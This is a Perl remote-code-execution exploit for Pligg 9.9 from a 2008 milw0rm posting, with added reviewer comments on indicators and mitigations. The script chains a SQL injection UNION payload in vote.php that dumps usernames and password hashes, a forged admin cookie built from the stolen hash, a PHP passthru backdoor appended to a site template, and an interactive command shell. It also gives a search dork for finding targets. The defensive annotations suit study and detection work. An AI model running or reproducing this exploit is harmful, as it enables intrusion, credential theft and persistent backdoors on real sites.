Pligg 9.9.0 Remote Code Execution Exploit by h3m4n


   1   #!/usr/bin/perl −w
   2   use LWP::UserAgent;
   3   use MIME::Base64;
   4   use Digest::MD5 qw(md5_hex);
   5   use Getopt::Std; getopts(’h:’, \%args);
       # NOTE(review): this listing is a PDF scrape. Quotes are rendered as U+2019 and
       # hyphens/minus signs as U+2212 throughout, so the text exactly as shown does not
       # parse as Perl; it is kept verbatim. The comments added below map each request
       # the script makes to the Pligg component involved and to what a defender can
       # look for, and name the mitigation for each weakness the script relies on.
       #
       # Script-level observations: no "use strict"/"use warnings" (only −w on the
       # shebang), %args is an undeclared package global, and every server response is
       # judged only by a regex over the body — HTTP status codes are never examined.
   6
   7   print   "#############################################\n";
   8   print   "# Pligg <= 9.9 Remote Code Execution Exploit \n";
   9   print   "#############################################\n";
  10   #dork   = "Powered By Pligg" + "Legal: License and Source"
  11
  12   # Proxy address
  13   $ENV{http_proxy} = ’http://127.0.0.1:8118/’;
  14
       # Single UA object so the cookie jar persists across requests; the UA string
       # mimics Firefox 3.0.1, so user-agent filtering alone would not flag this client.
  15   my $http = LWP::UserAgent−>new;
  16      $http−>agent(’Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1’);
  17      #$http−>env_proxy(); # <−− uncomment for proxy
  18      $http−>cookie_jar({});
  19
       # −h is the base URL of the Pligg install; usage() exits when it is missing
       # (or false). The remaining scalars are filled in by the steps below; @auth
       # is later overwritten with the forged Cookie header.
  20   my   $host   =   $args{’h’} || usage(); # Host flag. Specify the Pligg root directory
  21   my   $user   =   undef;
  22   my   $pass   =   undef;
  23   my   $file   =   undef;
  24   my   $data   =   undef;
  25   my   @auth   =   undef;
  26
  27   # Details for the php code that is injected in to the template
       # $code is the payload appended to a template: a PHP block that hands the
       # request parameter named by $cvar ("cmd") to passthru(), wrapped in
       # <cmdout> tags so the output can be cut out of the rendered page with $ereg.
       # Indicators of compromise derived from this: template files (.tpl) containing
       # "<cmdout>" or "passthru($_REQUEST", rendered pages containing "<cmdout>",
       # and POST requests to index.php carrying a "cmd" parameter. Because the
       # payload only ever reaches the server through the template editor (below),
       # a file-integrity check on the deployed templates is the direct detection.
  28   my $ereg = ’<cmdout>(.*?)<\/cmdout>’;
  29   my $cvar = ’cmd’;
  30   my $cval = ’pwd;id’;
  31   my $code = ’<cmdout><?php if ( !empty($_REQUEST["’ . $cvar . ’"]) ) passthru($_REQUEST["’ . $cvar . ’"]); ?></cmdout>’;
  32
  33   print "[*] Checking if a shell already exists ...\n";
  34
       # Pre-check: if index.php already echoes <cmdout>, a backdoor from an earlier
       # run (by anyone) is present and the injection/template steps are skipped.
       # A site that has been hit once is therefore reusable by any later client
       # without any further exploitation traffic — the only trace is the "cmd" POST.
  35   $data = $http−>post(
  36   $host . ’/index.php’,
  37   [
  38       $cvar => $cval
  39   ]);
  40
  41   if ( $data−>content =~ /$ereg/si )
  42   {
  43           print "[*] Found existing shell ...\n";
  44   }
  45   else
  46   {
  47           print "[!] No existing shell found ...\n";
  48
  49              #############################################
  50              # Gather user info via vote.php SQL Injection
  51              #############################################
  52

                # SQL injection in vote.php: the "id" parameter is spliced into a query
                # unquoted, so a UNION SELECT reads user_login:user_pass out of
                # pligg_users and the result is reflected in the response body. The
                # "md5" value is d41d8cd98f00b204e9800998ecf8427e — the MD5 of the empty
                # string — which the original author notes is accepted for anonymous
                # callers; whatever that token is meant to validate, a fixed value gives
                # it no protective effect. Mitigations: prepared statements / integer
                # casting for "id"; bind any request-validation token to the session
                # and reject it for unauthenticated requests. Detection: "UNION SELECT"
                # or "pligg_users" in the vote.php query/body, and a vote request whose
                # response leaks a login:hash pair.
  53            $data = $http−>post(
  54            $host . ’/vote.php’,
  55            [
  56                ’id’ => ’−99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users −− /*’,
  57               ’md5’ => ’d41d8cd98f00b204e9800998ecf8427e’ # <−− If you aren’t logged in this always works
  58            ]);
  59
  60            print "[*] Gathering user information ...\n";
  61
                # Takes the first "something:hex" pair found anywhere in the HTML as
                # login:hash. Nothing here cracks the hash: the cookie below is built
                # from the stored hash itself, so the hash is a password equivalent
                # ("pass-the-hash"). Hashing passwords in the database is no defence
                # when the session credential is derived from the hash; derive session
                # cookies from a random server-side secret instead.
  62            if ( $data−>content =~ /(.*?):([a−f0−9]{1,64})/i )
  63            {
  64                    $user = $1;
  65                    $pass = $2;
  66
  67                     # Sets up the cookie to authenticate us
                         # mnm_key = base64(user ":" crypt(user, "22") ":" md5(hash)). The salt
                         # "22" is hard-coded, which suggests the server-side cookie check uses
                         # a fixed salt — confirm against the Pligg source before relying on
                         # that. Once forged, every later request looks like an ordinary
                         # logged-in admin session; correlating it with the preceding vote.php
                         # injection from the same client is what makes it recognisable.
  68                     @auth = (’Cookie’ => ’mnm_user=’ . $user . ’; mnm_key=’ . encode_base64($user . ’:’ . crypt($user, 22) .
        ’:’ . md5_hex($pass)) . ’;’);
  69
  70                       print "[+] Got user ’$user’ ...\n";
  71
  72            }
  73            else
  74            {
  75                       print "[!] Unable to get user info. Dumping output ...\n";
                           # Bareword handle, 2-arg open, no error check: the raw response is
                           # written to pligg_debug.html in the current directory.
  76                       open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  77                       exit;
  78            }
  79
  80            #############################################
  81            # Get the template path
  82            #############################################
  83
  84            print "[*] Gathering template information ...\n";
  85
                # The admin template editor is reached with nothing but the forged
                # cookie. The first <option> in its file list becomes the target; when
                # that is admin_templates/admin_access_denied.tpl it is rewritten to
                # footer.tpl. Mitigations: require re-authentication (or a fresh, random
                # session) for admin pages, and keep template files unwritable by the
                # web-server user so the editor cannot be used to persist code at all.
  86            $data = $http−>get($host . ’/admin_editor.php’,@auth);
  87
  88            if ( $data−>content =~ />(.*?)<\/option>/i )
  89            {
  90                    $file = $1;
  91                    # Quick and dirty fix
  92                    $file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
  93                    print "[+] Got template file [$file]...\n";
  94            }
  95
  96            #############################################
  97            # Read the template contents
  98            #############################################
  99
                # Reads the current template text back so it can be re-saved intact with
                # the payload appended; the site keeps rendering normally afterwards.
  100           $data = $http−>post(
  101           $host . ’/admin_editor.php’,
  102           [
  103              ’the_file’ => $file,
  104               ’open’ => ’Open’
  105         ]
  106         ,@auth);
  107
  108         print "[*] Reading template data ...\n";
  109
  110         # Grab the template contents
             # The editor shows the file HTML-escaped inside a <textarea>; the four
             # entity substitutions undo that so the original bytes are restored. Only
             # these four entities are handled, so any other entity in the template
             # would be re-saved in escaped form (a small, visible diff — see below).
  111         if ( $data−>content =~ /<textarea(.*)>(.*)<\/textarea>/is )
  112         {
  113                 $temp = $2;
  114                 $temp =~ s/&gt;/>/ig;
  115                 $temp =~ s/&lt;/</ig;
  116                 $temp =~ s/&quot;/"/ig;
  117                 $temp =~ s/&amp;/&/ig;
  118
  119                    print "[+] Got template data ...\n";
  120         }
  121         else
  122         {
  123                    print "[!] Unable to get template data. Dumping output ...\n";
                         # Same unchecked bareword/2-arg open as above; dumps the response.
  124                    open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  125                    exit;
  126         }
  127
  128         #############################################
  129         # Update the Template Contents
  130         #############################################
  131
  132
             # Persistence step: the template is saved back with $code appended. The
             # template engine evidently executes embedded PHP, since index.php is
             # expected to return <cmdout> right after this save. Detection: the
             # deployed template differs from the packaged copy only by a trailing
             # "<cmdout><?php ... passthru(...) ?></cmdout>" block, and the access log
             # shows an admin_editor.php POST with "save" from the same client that hit
             # vote.php moments earlier. Mitigation: reject "<?" in editor submissions
             # or, better, render templates without PHP execution and keep them
             # read-only for the web process.
  133         $data = $http−>post(
  134         $host . ’/admin_editor.php’,
  135         [
  136            ’the_file2’   => $file,
  137            ’updatedfile’ => $temp . $code,
  138            ’save’          => ’Save+Changes’
  139         ]
  140         ,@auth);
  141
  142         print "[*] Updating template data ...\n";
  143
             # Success is inferred solely from the "File Saved" text in the body.
  144         if ( $data−>content =~ /File Saved/is )
  145         {
  146                 print "[+] File saved!\n";
  147         }
  148         else
  149         {
  150                 print "[!] Unable to update template data. Dumping output ...\n";
  151                 open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  152                 exit;
  153         }
  154   }
  155

  156   #############################################
  157   # Setting up the php shell
  158   #############################################
  159
  160   print "[*] Setting up shell ...\n";
  161
        # Verifies the persisted payload by repeating the pre-check request; only the
        # presence of <cmdout> in index.php's output is tested.
  162   $data = $http−>post(
  163   $host . ’/index.php’,
  164   [
  165       $cvar => $cval
  166   ]);
  167
  168   if ( $data−>content =~ /<cmdout>(.*?)<\/cmdout>/si )
  169   {
                # Interactive loop with no exit condition (terminated by Ctrl-C/EOF
                # from the operator). Each line read from STDIN is sent unmodified as
                # the "cmd" parameter of a POST to index.php, and whatever the server
                # returns between <cmdout> tags is printed; $1 is reused straight from
                # the match on the line above. From the server's side this is a series
                # of POSTs to index.php with a "cmd" body parameter from one client —
                # access logs that record only the request line will not show the
                # parameter, so request-body logging / a WAF rule, or host-side
                # monitoring for the PHP worker spawning shells (passthru), is what
                # surfaces it.
  170           while ( 1 )
  171           {
  172                   print "pligg:~#";
  173                   $exec = <STDIN>;
  174
  175                         $data = $http−>post(
  176                         $host . ’/index.php’,
  177                         [
  178                             $cvar => $exec
  179                         ]);
  180
  181                         if ( $data−>content =~ /$ereg/si )
  182                         {
  183                                 print $1 . "\n";
  184                         }
  185                         else
  186                         {
  187                                 print "Unexpected Response!\n";
  188                         }
  189              }
  190   }
  191   else
  192   {
  193              print "[!] Unable to set up shell ...\n";
                   # Same unchecked bareword/2-arg open as in the earlier branches.
  194              open(ELOG, ’>pligg_debug.html’);print ELOG $data−>content;close(ELOG);
  195              exit;
  196   }
  197
        # Prints the one accepted invocation form and exits the process. Reached via
        # "$args{’h’} || usage()" above, i.e. whenever −h is absent or has a false
        # value; it never returns, so the caller's "my $host = ..." is never assigned.
  198   sub usage
  199   {
  200           print "pligg_exploit.pl −h http://path/to/pligg   \n";
  201           exit;
  202   }
  203
  204   # milw0rm.com [2008−07−30]




								